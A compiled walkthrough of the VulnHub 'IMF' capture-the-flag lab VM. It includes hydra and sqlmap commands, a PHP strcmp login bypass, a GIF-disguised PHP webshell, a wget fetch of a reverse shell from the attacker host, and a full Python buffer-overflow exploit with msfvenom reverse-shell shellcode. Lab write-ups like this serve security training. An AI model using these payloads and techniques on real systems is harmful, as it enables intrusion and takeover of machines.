25 VM: IMF: 1

https://www.vulnhub.com/entry/imf-1,162/

Walkthru:

A. https://reedphish.wordpress.com/2016/11/20/imf-walkthrough/ [ decode base64, combing base64 strings, Strcmp PHP documentation, SQLInjections error, SQLMap with --cookie, service listening on localhost only,ps -aux, /etc/init.d, /etc/knockd.conf, port knocking, “%s” injection, run ltrace command on agent, pattern_create.rb & pattern_offset.rb script from Metasploit, Getting offset, gdb buffer overflow,  peda, Exploiting agent crashing, MSFVenom

B. https://skiponacci.github.io/imf-walkthrough/ [bypassing  CrappyWAF file type restriction, QR code, xxd , hidding php webshell to run cmd in gif, php revrese shell, netstat -antp, ]

C. https://securitybytes.io/imf-impossible-mission-force-49be86323082 [port knocking, file cmd, handling 32 bit file on 64bit kali during  BOF]

D. https://sec.alexflor.es/post/imf_walkthrough/ [msfvenom -p,pattern_create.rb.pattern_offset.rb, arbitrary  python code to create code for bof]

E. http://www.t0w3ntum.com/2016-11-06/IMF[logging with CURL CLI, SQL injection test, used curl instead of browser, objdump]

Notes:

1. Only port 80 is open – fair enough
2. Flag 1
Finding the first flag required some digging. I found it reading through the HTML source of each page available. The flag is in the source code for the contact.php page hidden in a comment (Base64 encoded):

Raw: flag1{YWxsdGhlZmlsZXM=}
Dec: allthefiles

What allthefiles refer to is unclear at this moment.

3. Flag 2
Still working on contact.php I noticed a Javascript filename that stood out. From the looks of it, it appears Base64 encoded too.

Raw: eVlYUnZjZz09fQ==.min.js
Dec: yYXRvcg==}

initial attempt didn’t make any sense. Looking at the same Javascript inclusion segment I notice other files with peculiar names:

1 2 3

<a href="http://js/ZmxhZzJ7YVcxbVl.js">http://js/ZmxhZzJ7YVcxbVl.js</a> <a href="http://js/XUnRhVzVwYzNS.js">http://js/XUnRhVzVwYzNS.js</a> <a href="http://js/eVlYUnZjZz09fQ==.min.js">http://js/eVlYUnZjZz09fQ==.min.js</a>

Looked into exploiting modernizer which didn't result in any success up till now. Also gathered all the words from the site usign curl and ran dirbuster which wasn't that helpful.

These seems to be a part of a much bigger Base64 encoded string. Adding them together:

1	ZmxhZzJ7YVcxbVl + XUnRhVzVwYzNS + eVlYUnZjZz09fQ== = ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==

This new string decodes to flag2{aW1mYWRtaW5pc3RyYXRvcg==}, the inner string aW1mYWRtaW5pc3RyYXRvcg== decodes to imfadministrator

String appears to be a username or a path of some sort.

Tried with hydra and sqlmap to get into the site/application but failed. However, when I ran it against user "rmicheals", the site responded that the password is incorrect while for others it stated that username is correct. Now I know the username "rmicheals" is correct.

#hydra -t 32 -l Roger -P /usr/share/wordlists/rockyou.txt 192.168.106.6 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username." -V

#hydra -t 32 -l akeith -P /usr/share/wordlists/rockyou.txt 192.168.106.6 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username." -V

#hydra -t 32 -l rmicheals -P /usr/share/wordlists/rockyou.txt 192.168.106.6 http-post-form "/imfadministrator/:user=^USER^&pass=^PASS^:F=Invalid username." -V

#sqlmap --dbms MySQL -u "http://192.168.106.6/imfadministrator" --dbs --level=5 --risk=5

4. Flag 3

Trying the path of least resistance I added imfadministrator to the URL and got a login form. The HTML source revealed a hint:

1	<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->

The first thing that comes to mind is that I have to exploit a PHP function comparing strings. The most likely candidate is Strcmp paired with type confusion. But first I need a decent username. Perhaps I could use one of the contact email addresses? I quickly harvest the emails on the contact page:

• rmicheals@imf.local
• akeith@imf.local
• estone@imf.local

Researching Strcmp PHP documentation I found that when comparing an array to a string, Strcmp will return NULL. This may trigger some interesting side effects.

Strcmp examples @ https://attack.samsclass.info/phpfail.htm.

Strcmp behavior in PHP 5.2 vs 5.3
I've noticed the behavior of strcmp() is difference between PHP 5.2 and PHP 5.3+.
In PHP 5.2, strcmp('Array', array()) returns 0 (not NULL) because arguments of this function should be converted to String (see also: http://jp2.php.net/manual/en/language.types.string.php#language.types.string.casting).
But, since PHP 5.3, strcmp('...', array()) returns NULL as you say. Source @

http://danuxx.blogspot.com/2013/03/unauthorized-access-bypassing-php-strcmp.html

To exploit this I changed the name of the password field using Firefox from “pass” to “pass[]”, entered rmichaels as username and submitted the form. This’ll force Strcmp to handle “pass” as an array and Bam! The third flag!

• Raw: flag3{Y29udGludWVUT2Ntcw==}
• Dec: continueTOcms

Option 4a using CLI [walkthru E]

root@kali:~# curl -X POST -F "pass=password" -F "user=rmichaels" http://192.168.1.62/imfadministrator/
Invalid password<form method="POST" action="">
<label>Username:</label><input type="text" name="user" value=""><br />
<label>Password:</label><input type="password" name="pass" value=""><br />
<input type="submit" value="Login">
<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->
</form>
root@kali:~#
root@kali:~# curl -c /tmp/imf.cookie -X POST -F "pass[]=password" -F "user=rmichaels" http://192.168.1.62/imfadministrator/
flag3{Y29udGludWVUT2Ntcw==}<br />Welcome, rmichaels<br /><a href='cms.php?pagename=home'>IMF CMS</a>r


root@kali:~# echo Y29udGludWVUT2Ntcw== | base64 -d
continueTOcms

5. Flag 4

Visiting that link lead me to this page:

================ from walkthru E

I tried LFI/RFI on the pagename= parameter with no success. Thinking it might be SQL injection, I tried ‘1’ OR ‘1 and got an error message.

root@kali:~# curl -b /tmp/imf.cookie 'http://192.168.1.62/imfadministrator/cms.php?pagename=%271%27%20OR%20%271'
<html>
<head>
<title>IMF CMS</title>
</head>
<body>
<h1>IMF CMS</h1>
Menu:
<a href='cms.php?pagename=home'>Home</a> |
<a href='cms.php?pagename=upload'>Upload Report</a> |
<a href='cms.php?pagename=disavowlist'>Disavowed list</a> |
Logout
<br /><br/>
<br />
<b>Warning</b>:  mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in <b>/var/www/html/imfadministrator/cms.php</b> on line <b>29</b><br />
</body>
</html>

================

MF CMS

By looking at the page navigation the navigation happens through GET parameter “pagename”. Inputting a simple ” ‘ ” revealed a MySQL error message which means it’s time for some SQLInjections! For once I let SQLMap do the lifting.

1	$ sqlmap --url target_address/imfadministrator/cms.php?pagename=home --cookie "PHPSESSID=e7tgfr2op1sunh8b9qpspq55f0" --level 2 --dbms mysql

Then moving on acquiring some tables

1	sqlmap --url target_address/imfadministrator/cms.php?pagename=home --cookie "PHPSESSID=e7tgfr2op1sunh8b9qpspq55f0" --dbms mysql --tables --dump

Lots and lots of output later I acquire the content of the pages table holding the navigation:

id	pagename
1	upload
2	home
3	tutorials-incomplete
4	disavowlist

The table retrieved reveal one page not listed in the main navigation. Visiting “tutorials-incomplete”:

#sqlmap --url http://192.168.106.6/imfadministrator/cms.php?pagename=home --cookie PHPSESSID=e7tgfr2op1sunh8b9qpspq55f0 --level 2 --dbms mysql --tables --dump 

MF Classroom QR

There’s a QR code in this picture. For those periodically reading my blog may remember I call them cows and that I don’t like them since they may lead to danger. Shoot. Anyways, I uploaded the whole image to zxing to decode it. It decodes to:

• Raw: flag4{dXBsb2Fkcjk0Mi5waHA=}
• Dec: uploadr942.php

6. Flag five:  [see walkthru B]

Another directory. This directory allows for some file upload capabilities.

192.168.1.144/imfadministrator/uploadr942.php

Turns out that files with the .php extension are disallowed, and that there is a “CrappyWAF” filtering uploads.

Now it’s time to see where authorized files get uploaded.

I upload a .gif file and .jpg and check the page source which reveals that each file is renamed to a unique string once uploaded, but where do they go…

I decided to quickly check /imfadministrator/upload which gives a 404.

But…./imfadministrator/uploads gives a 403, so it is there.

Given that information, I test both a .jpg file and .gif with phpinfo inside.

I echo in the jpg hex header, and add the .gif extension first:

root@kali:~# echo 'FFD8FFEo' | xxd -r -p > phpinfo.gif

root@kali:~# echo '<?php phpinfo(); ?>' >> phpinfo.gif

xxd creates a hexdump, the use of the combination -r and -p read plain hexadecimal dumps without line number information and without a particular column layout.

List of file signatures: https://en.wikipedia.org/wiki/List_of_file_signatures

With this we can fool the uploadr. The code will view this file as a jpg.

I upload the file, check the source and append the filename with .gif to the url.

http://192.168.1.144/imfadministrator/uploads/2a14ac4e8587.gif

This results in a successful display of the server’s phpinfo page!

I can now try to obfuscate the php webshell enough so that it doesn’t get caught in the WAF.

I ended up using an awesome php shell from: https://t0w3ntum.com/2016/11/06/imf-vulnhub/

root@kali:~/imf# echo 'FFD8FFEo' | xxd -r -p > webshell.gif

root@kali:~/imf# echo '<?php $cmd=$_GET["cmd"]; echo `$cmd`; ?>' >> webshell.gif

In this situation, files with the .jpg file extensions are not run with php, but files with the .gif extensions are.

This means that any php code inside the fake .gif file (aside from the blacklisted functions determined by the WAF) will run.

So uploading the above webshell.gif file will allow for remote code execution:

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=id

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=ls

Note: I already attempted a file upload here. The “php-reverse-shell.php” is not stock!

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=cat%20flag5_abc123def.txt

YWdlbnRzZXJ2aWNlcw==

Flag five decodes to:

root@kali:~/imf# echo YWdlbnRzZXJ2aWNlcw== | base64 --decode agentservices

With RCE now possible, we can use wget to download a reverse shell hosted our attacking machine.



To start a SimpleHTTPServer go to the directory you want to serve your file from on Kali and type:

root@kali:/var/www/html# ls |grep php-reverse-shell
php-reverse-shell.php
root@kali:/var/www/html# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

This command will start an HTTP server on port 80 from which you can serve all your malicious/post enumeration scripts from. In my case I am serving a php-reverse-shell from: http://pentestmonkey.net/tools/web-shells/php-reverse-shell.

Note: Make sure to change the listening port and IP to your desired port and your KALI IP inside the php-reverse-shell.

Now I can download the file onto the target machine. The %20 is used here to indicate a space in url encoding/percent encoding https://en.wikipedia.org/wiki/Percent-encoding.

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=wget%20192.168.1.130/php-reverse-shell.php

Note: When serving php shells, I always use SimpleHTTPServer. It doesn’t run the PHP code server side, just hosts the file. Apache2 will run the PHP code, and a lot of times you’ll pop a shell on yourself…

For good measure I make the file executable with chmod +x:

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=chmod%20+x%20php-reverse-shell.php

Confirm the file is there:

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=ls

Before running the reverse shell setup a listener with nc:

root@kali:~# nc -lvp 8080

The -l tells netcat to listen, -v tells netcat to be verbose, and -p tells netcat which port to listen on.

Finally with everything ready, run the php reverse shell.

http://192.168.1.144/imfadministrator/uploads/353bff7e548e.gif?cmd=php%20php-reverse-shell.php

7. Flag six:  [see walkthru B]

see flag 6 listed @ https://reedphish.wordpress.com/2016/11/20/imf-walkthrough/
-dont see the same screen in gdb

So let's have a look for services that contain the term ‘agent’

So we appear to have a custom program. /usr/local/bin/agent

That’s going on the list for further investigation.

tcp 0 0 *:agent *:* LISTEN — 
tcp 0 0 *:ssh *:* LISTEN -

and the following are running as root and therefore go on the list.

root 1117 1 0 Nov10 ? 00:00:00 /usr/sbin/sshd -D7

root 1152 1 1 Nov10 ? 01:34:57 /usr/sbin/knockd -d

Knockd is interesting..

Zeroflux.org // Judd Vinet
knockd [options] knockd is a port-knock server. It listens to all traffic on an ethernet (or PPP) interface, looking…www.zeroflux.org

Description

knockd is a port-knock server. It listens to all traffic on an ethernet (or PPP) interface, looking for special “knock” sequences of port-hits. A client makes these port-hits by sending a TCP (or UDP) packet to a port on the server. This port need not be open — since knockd listens at the link-layer level, it sees all traffic even if it’s destined for a closed port. When the server detects a specific sequence of port-hits, it runs a command defined in its configuration file. This can be used to open up holes in a firewall for quick access.

Anyway, let's start with /usr/local/bin/

Access codes, and the agent.

www-data@imf:/usr/local/bin$ cat access_codes
SYN 7482,8279,9467

I am guessing codes are the knockd sequence we require. So we need to send a syn packet to each of those 3 ports.

I’ve never come across this before, I found this quite a nice yet concise introduction:

How To Use Port Knocking to Hide your SSH Daemon from Attackers on Ubuntu | DigitalOcean
Port knocking is a method of protecting your services behind a firewall until connection attempts are made to a…www.digitalocean.com

Before:

root@kali:~# nmap -p- 172.16.26.133

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-22 01:35 EST
Stats: 0:01:48 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 192.168.159.142
Host is up (0.00057s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:C2:EB:63 (VMware)

knock, knock, knock!

root@kali:~# nmap -sS --max-retries 0 -T5 -p 7482,8279,9467 172.16.26.133

Starting Nmap 7.01 ( https://nmap.org ) at 2016-11-22 17:02 GMT
Warning: 172.16.26.133 giving up on port because retransmission cap hit (0).
Nmap scan report for 172.16.26.133
Host is up (0.00048s latency).
PORT     STATE    SERVICE
7482/tcp filtered unknown
8279/tcp filtered unknown
9467/tcp filtered unknown
MAC Address: 00:0C:29:C2:EB:63 (VMware)

After:

root@kali:~/Desktop/IMF# nmap -p- 172.16.26.133

Starting Nmap 7.01 ( https://nmap.org ) at 2016–11–22 17:03 GMT
Nmap scan report for 172.16.26.133
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
80/tcp open http
7788/tcp open unknown
MAC Address: 00:0C:29:C2:EB:63 (VMware)

We now have a new port open to us. It’s worth noting I had a LOT of issues getting this to work. I tried multiple different formats for hitting it LOTS of different times. I’m not sure if it was a timing issue, the delay between the two VM’s did seem pretty high, or something else. Either way it was annoying. I first tried with sT and port 7788 wasnt enabled but tried again w/o any switch and 7788 was available after that

So we have an ‘agent’ login portal. I don’t have an ID but I do have local access to the box and file so let's go and prod it.

www-data@imf:/var/www/html$ file /usr/local/bin/agent
/usr/local/bin/agent: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=444d1910b8b99d492e6e79fe2383fd346fc8d4c7, not stripped

Okay so it a 32bit ELF file. Checking our $PATH

www-data@imf:/var/www/html/imfadministrator/uploads$ echo $PATH
/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

We see that /usr/local/bin is included so we can just run this file locally too, cool.

Starting with a quick brute force of the application:

for x in seq{0..1000}; do echo “$x” | nc -nv 127.0.0.1 7788; echo $x; sleep .25; done;

The sleep was required because after 48 tries without it, it starts denying connection attempts. This got me nowhere. Fantastic! I then tried passing it progressively larger Agent IDs. At a million it was still handling the IDs gracefully, my efforts to force a (seg)fault failed.

Okay, time to chuck ltrace at it, which is conveniently installed on the host.

ltrace(1): library call tracer - Linux man page
ltrace is a program that simply runs the specified command until it exits. It intercepts and records the dynamic…linux.die.net

www-data@imf:/usr/local/bin$ ltrace ./agent
__libc_start_main(0x80485fb, 1, 0xff8bcba4, 0x8048970 <unfinished …>
setbuf(0xf76ccd60, 0) = <void>
asprintf(0xff8bcad8, 0x80489f0, 0x2ddd984, 0xf75340ec) = 8
puts(“ ___ __ __ ___ “ ___ __ __ ___ 
) = 18
puts(“ |_ _| \\/ | __| Agent” |_ _| \/ | __| Agent
) = 25
puts(“ | || |\\/| | _| Reporting” | || |\/| | _| Reporting
) = 29
puts(“ |___|_| |_|_| System\n” |___|_| |_|_| System

) = 27
printf(“\nAgent ID : “
Agent ID : ) = 12
fgets(12345“12345\n”, 9, 0xf76cc5a0) = 0xff8bcade
strncmp(“12345\n”, “48093572”, 8) = -1
puts(“Invalid Agent ID “Invalid Agent ID 
) = 18
+++ exited (status 254) +++

This is me passing the program a value, in this case it is the agent ID request.

fgets(12345

A little further down the trace we see:

strncmp(“12345\n”, “48093572”, 8) = -1

It looks like it is comparing my provided string against the string 48093572(and in this case resulting in a -1 condition which I assume is a not true result)

Using this as the agent ID:

www-data@imf:/usr/local/bin$ www-data@imf:/usr/local/bin$ agent
 ___ __ __ ___ 
 |_ _| \/ | __| Agent
 | || |\/| | _| Reporting
 |___|_| |_|_| System

Agent ID : 48093572
Login Validated 
Main Menu:
1. Extraction Points
2. Request Extraction
3. Submit Report
0. Exit
Enter selection:

We are in:

Options 2/3 both allow user input, yet again I threw content at them but couldn’t cause a crash, it failed gracefully, or did it?

I finally got wise and copied the file across to my local machine for fuzzing purposes.

****Caveat time, one machine I am working on is a 32bit Kali VM, the other is a 64bit Kali VM. So as I have made progress on this (over the course of a few days- Time constraints[and being crap at this sort of thing]and all that) I have produced screen shots from both machines. Meaning register values are different between some grabs. The thing to note here is 32 bit registers are Exx and 64 bit are Rxx and addresses in 32bit land are 0x01020304 vs 64bit land 0x00000001020304.*****

Now, I’ve posted this before but I’ll post it again.

To get a 32bit file running on 64bit Kali you need to do the following:

sudo dpkg --add-architecture i386
sudo apt-get update
sudo apt-get install libc6:i386 libncurses5:i386 libstdc++6:i386

Re-testing locally I finally hit a seg fault in the report submission option (3).

Woooooo!

So now I am going to repeat this exercise using walkthru C & D.

After navigating through our binary, we have a place where we have user input. This is looking like it’s going to be a buffer overflow exploit. Once we download our application and run it through gdb, we confirm that the report function is vulnerable.

Add caption

root@kali:/tmp# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9

root@kali:/tmp#

Bingo. Plug 0x41366641 into pattern_offset we see that our buffer ends at 168, meaning our EIP register is at 169. 

root@kali:# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 41366641

[*] Exact match at offset 168

gdb-peda$ info reg

eax            0xffffd5a4       0xffffd5a4

ecx            0xf7f9cdc7       0xf7f9cdc7

edx            0xf7f9d890       0xf7f9d890

ebx            0x0      0x0

esp            0xffffd650       0xffffd650

ebp            0x35664134       0x35664134

esi            0xf7f9c000       0xf7f9c000

edi            0x0      0x0

eip            0x41366641       0x41366641

eflags         0x10286  [ PF SF IF RF ]

cs             0x23     0x23

ss             0x2b     0x2b

ds             0x2b     0x2b

es             0x2b     0x2b

fs             0x0      0x0

gs             0x63     0x6

use jmpcall cmd to see the value of eax

o now we would like to test we can successfully overwrite EIP with a value of our choosing and see what kind of space we have for shell code after. To do this I will use the following to crash the server again:

A * 168 (up to where we believe EIP to be located)

B * 4 (What we think is EIP)

C * 500 (space after EIP where we might be able to dump shell code).

python -c ‘print “A” *168 + “B” * 4 + “C” * 500’

and passing this in as the string produces the following:

We have successfully overwritten EIP with our 4 B’s. We now have control of EIP. We need somewhere to stash our shell code so we can point at it.

We can see that E(R)AX actually contains our A’s. Meaning we already control this. So theoretically inserting shell code and relevant padding to make it up to 168 chars long should read the return the address in EIP, which will call E(R)AX, taking it back to the beginning of our code and executing on it’s ‘second pass through’.

Now we require the shell code. MSFVenom offers a -b switch. This is to remove bad chars. In this instance I have removed null bytes 0x00, as this generally terminates a string. x0a as this is a line feed and x0d as this is carriage return, both of which would be the equivalent of hitting return, as such if they appeared mid way through the shellcode they would break it. It’s highly possible there are more bad chars, the simple way to check this is to send a payload of all chars and review them in the data dump in a debugger to see if any of them truncated or generally got messed up.

Anyway, now we require shellcode.

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.159.141 LPORT=8443 -f python -b "\x00\x0a\x0d"
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
buf =  ""
buf += "\xba\x7d\x98\xf4\xd7\xdb\xca\xd9\x74\x24\xf4\x5d\x29"
buf += "\xc9\xb1\x12\x31\x55\x12\x03\x55\x12\x83\xb8\x9c\x16"
buf += "\x22\x73\x46\x21\x2e\x20\x3b\x9d\xdb\xc4\x32\xc0\xac"
buf += "\xae\x89\x83\x5e\x77\xa2\xbb\xad\x07\x8b\xba\xd4\x6f"
buf += "\xcc\x95\xb8\xe2\xa4\xe7\xc6\xed\x68\x61\x27\xbd\xf7"
buf += "\x21\xf9\xee\x44\xc2\x70\xf1\x66\x45\xd0\x99\x57\x69"
buf += "\xa6\x31\xc0\x5a\x2a\xa8\x7e\x2c\x49\x78\x2c\xa7\x6f"
buf += "\xcc\xd9\x7a\xef"

It’s worth noting the above shell code is 95 bytes long. Our test code had 500 bytes of C, we don’t need this as we are returning to the start of EAX, but it still has to result in 168 bytes to ensure we continue to his EIP.

Our code therefore should look like this..

“\x90" * (168 -len(shellcode)) + RET

So converting this into a PoC python exploit….

#!/usr/bin/python

import socket

host = "192.168.159.142"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 7788))
s.recv(1024)
s.send("48093572\n")
s.recv(1024)
s.send("3\n")
s.recv(1024)

pad = "\x90" * (168-98)
ret = "\x63\x85\x04\x08\n"

buf =  ""
buf += "\xd9\xea\xd9\x74\x24\xf4\x5b\xbf\x18\x53\xaa\xcb\x29"
buf += "\xc9\xb1\x12\x83\xeb\xfc\x31\x7b\x16\x03\x7b\x16\xe2"
buf += "\xed\x62\x71\x3c\xee\xd6\xc6\x90\x9a\xda\x78\x70\xd3"
buf += "\x3a\xb5\xfd\x74\xe7\x2e\x3e\xd2\x87\x22\xd6\x20\xb8"
buf += "\x2c\xc6\xad\x59\x26\x6e\xf5\xc9\xe6\x39\x8c\x0b\x4b"
buf += "\x0b\x0e\x79\x4b\x2a\x0e\x6e\x54\x4c\x87\x6d\x95\xa7"
buf += "\x9b\xb0\xf5\x34\x13\x4f\x37\xc4\x08\x39\x26\x5c\x18"
buf += "\x35\x19\x5c\xa9\xc6\xa6\x82"

buffer = pad + buf + ret

print "Sending the evil"
s.send(buffer)
s.recv(1024)
s.close
print "Check for a shell."

So I am get a response from the host but it’s not returning a shell. Something isn’t quite right. At this point I faffed around with the shell code and ports a good number of times, getting nowhere. Then it hit me:

#!/usr/bin/python

import socket

host = “192.168.159.142”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 7788))
s.recv(1024)
s.send(“48093572\n”)   #send the code and press enter
s.recv(1024)           # https://docs.python.org/3/library/socket.html
s.send(“3\n”)          #select option 3 and enter
s.recv(1024)

#0x08048563 : call eax
#little endian = \x63\x85\x04\x08

ret = “\x63\x85\x04\x08” #use jmpcall cmd to get the eax value

buf = “”
buf += “\xba\x7d\x98\xf4\xd7\xdb\xca\xd9\x74\x24\xf4\x5d\x29”
buf += “\xc9\xb1\x12\x31\x55\x12\x03\x55\x12\x83\xb8\x9c\x16”
buf += “\x22\x73\x46\x21\x2e\x20\x3b\x9d\xdb\xc4\x32\xc0\xac”
buf += “\xae\x89\x83\x5e\x77\xa2\xbb\xad\x07\x8b\xba\xd4\x6f”
buf += “\xcc\x95\xb8\xe2\xa4\xe7\xc6\xed\x68\x61\x27\xbd\xf7”
buf += “\x21\xf9\xee\x44\xc2\x70\xf1\x66\x45\xd0\x99\x57\x69”
buf += “\xa6\x31\xc0\x5a\x2a\xa8\x7e\x2c\x49\x78\x2c\xa7\x6f”
buf += “\xcc\xd9\x7a\xef”

pad = “\x90” * 73

buffer = buf + pad + ret

s.send(buffer)
s.recv(1024)
print “Check for a shell.”

Starting the script with the buffer then padding, rather than padding with NOPs and then the buffer works. I’m sure there are reasons for this but I don’t know what they are. Running the new script I get:

Success!

Browsing to /root/

root@imf:/root# cat Flag.txt
cat Flag.txt
flag6{R2gwc3RQcm90MGMwbHM=}

flag6{Gh0stProt0c0ls}